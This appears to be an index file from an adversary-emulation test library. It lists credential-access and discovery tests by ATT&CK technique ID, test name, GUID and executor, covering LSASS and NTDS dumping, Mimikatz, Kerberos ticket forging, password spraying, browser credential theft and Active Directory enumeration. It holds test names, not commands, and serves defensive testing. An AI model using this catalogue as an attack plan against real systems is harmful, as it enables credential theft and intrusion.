credential-access,T1003.002,OS Credential Dumping: Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
credential-access,T1110.002,Brute Force: Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1003.004,OS Credential Dumping: LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
credential-access,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,3,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,8c385f88-4d47-4c9a-814d-93d9deec8c71,powershell
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,powershell
credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
credential-access,T1555,Credentials from Password Stores,6,WinPwn - Loot local Credentials - lazagne,079ee2e9-6f16-47ca-a635-14efcd994118,powershell
credential-access,T1555,Credentials from Password Stores,7,WinPwn - Loot local Credentials - Wifi Credentials,afe369c2-b42e-447f-98a3-fb1f4e2b8552,powershell
credential-access,T1555,Credentials from Password Stores,8,WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords,db965264-3117-4bad-b7b7-2523b7856b92,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,10,Stage Popular Credential Files for Exfiltration,f543635c-1705-42c3-b180-efd6dc6e7ee7,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,16,BrowserStealer (Chrome / Firefox / Microsoft Edge),6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Unsecured Credentials: Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,8,CertUtil ExportPFX,336b25bf-4514-4684-8924-474974f28137,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,9,Export Root Certificate with Export-PFXCertificate,7617f689-bbd8-44bc-adcd-6f8968897848,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,10,Export Root Certificate with Export-Certificate,78b274f8-acb0-428b-b1f7-7b0d0e73330a,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,11,Export Certificates with Mimikatz,290df60e-4b5d-4a5e-b0c7-dc5348ea0c86,command_prompt
credential-access,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,11,Dump LSASS with createdump.exe from .Net v5,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1110.003,Brute Force: Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Brute Force: Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Brute Force: Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1110.003,Brute Force: Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
credential-access,T1110.003,Brute Force: Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,8,Password Spray using Kerbrute Tool,c6f25ec3-6475-47a9-b75d-09ac593c5ecb,powershell
credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1649,Steal or Forge Authentication Certificates,1,Staging Local Certificates via Export-Certificate,eb121494-82d1-4148-9e2b-e624e03fbf3d,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1110.004,Brute Force: Credential Stuffing,3,Brute Force:Credential Stuffing using Kerbrute Tool,4852c630-87a9-409b-bb5e-5dc12c9ebcde,powershell
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell
credential-access,T1003.006,OS Credential Dumping: DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
credential-access,T1003.006,OS Credential Dumping: DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
credential-access,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
discovery,T1087.002,Account Discovery: Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Account Discovery: Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
discovery,T1087.002,Account Discovery: Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,6,Adfind - Enumerate Active Directory Admins,b95fd967-4e62-4109-b48d-265edfd28c3a,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1087.002,Account Discovery: Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
discovery,T1087.002,Account Discovery: Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1087.002,Account Discovery: Domain Account,13,Enumerate Linked Policies In ADSISearcher Discovery,7ab0205a-34e4-4a44-9b04-e1541d1a57be,powershell
discovery,T1087.002,Account Discovery: Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
discovery,T1087.002,Account Discovery: Domain Account,15,WinPwn - generaldomaininfo,ce483c35-c74b-45a7-a670-631d1e69db3d,powershell
discovery,T1087.002,Account Discovery: Domain Account,16,Kerbrute - userenum,f450461c-18d1-4452-9f0d-2c42c3f08624,powershell
discovery,T1087.002,Account Discovery: Domain Account,17,Wevtutil - Discover NTLM Users Remote,b8a563d4-a836-4993-a74e-0a19b8481bfe,powershell
discovery,T1087.002,Account Discovery: Domain Account,18,Suspicious LAPS Attributes Query with Get-ADComputer all properties,394012d9-2164-4d4f-b9e5-acf30ba933fe,powershell
discovery,T1087.002,Account Discovery: Domain Account,19,Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property,6e85bdf9-7bc4-4259-ac0f-f0cb39964443,powershell
discovery,T1087.002,Account Discovery: Domain Account,20,Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope,ffbcfd62-15d6-4989-a21a-80bfc8e58bb5,powershell
discovery,T1087.002,Account Discovery: Domain Account,21,Suspicious LAPS Attributes Query with adfind all properties,abf00f6c-9983-4d9a-afbc-6b1c6c6448e1,powershell
discovery,T1087.002,Account Discovery: Domain Account,22,Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd,51a98f96-0269-4e09-a10f-e307779a8b05,powershell
discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directory Enumeration with LDIFDE,22cf8cb9-adb1-4e8c-80ca-7c723dfc8784,command_prompt
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
discovery,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1135,Network Share Discovery,7,PowerView ShareFinder,d07e4cc1-98ae-447e-9d31-36cb430d28c4,powershell
discovery,T1135,Network Share Discovery,8,WinPwn - shareenumeration,987901d1-5b87-4558-a6d9-cffcabc638b8,powershell
discovery,T1135,Network Share Discovery,9,Network Share Discovery via dir command,13daa2cf-195a-43df-a8bd-7dd5ffb607b5,command_prompt
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
discovery,T1082,System Information Discovery,13,WinPwn - winPEAS,eea1d918-825e-47dd-acc2-814d6c58c0e1,powershell
discovery,T1082,System Information Discovery,14,WinPwn - itm4nprivesc,3d256a2f-5e57-4003-8eb6-64d91b1da7ce,powershell
discovery,T1082,System Information Discovery,15,WinPwn - Powersploits privesc checks,345cb8e4-d2de-4011-a580-619cf5a9e2d7,powershell
discovery,T1082,System Information Discovery,16,WinPwn - General privesc checks,5b6f39a2-6ec7-4783-a5fd-2c54a55409ed,powershell
discovery,T1082,System Information Discovery,17,WinPwn - GeneralRecon,7804659b-fdbf-4cf6-b06a-c03e758590e8,powershell
discovery,T1082,System Information Discovery,18,WinPwn - Morerecon,3278b2f6-f733-4875-9ef4-bfed34244f0a,powershell
discovery,T1082,System Information Discovery,19,WinPwn - RBCD-Check,dec6a0d8-bcaf-4c22-9d48-2aee59fb692b,powershell
discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
discovery,T1082,System Information Discovery,25,System Information Discovery with WMIC,8851b73a-3624-4bf7-8704-aa312411565c,command_prompt
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
discovery,T1217,Browser Bookmark Discovery,7,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
discovery,T1016,System Network Configuration Discovery,9,DNS Server Discovery Using nslookup,34557863-344a-468f-808b-a1bfb89b4fa9,command_prompt
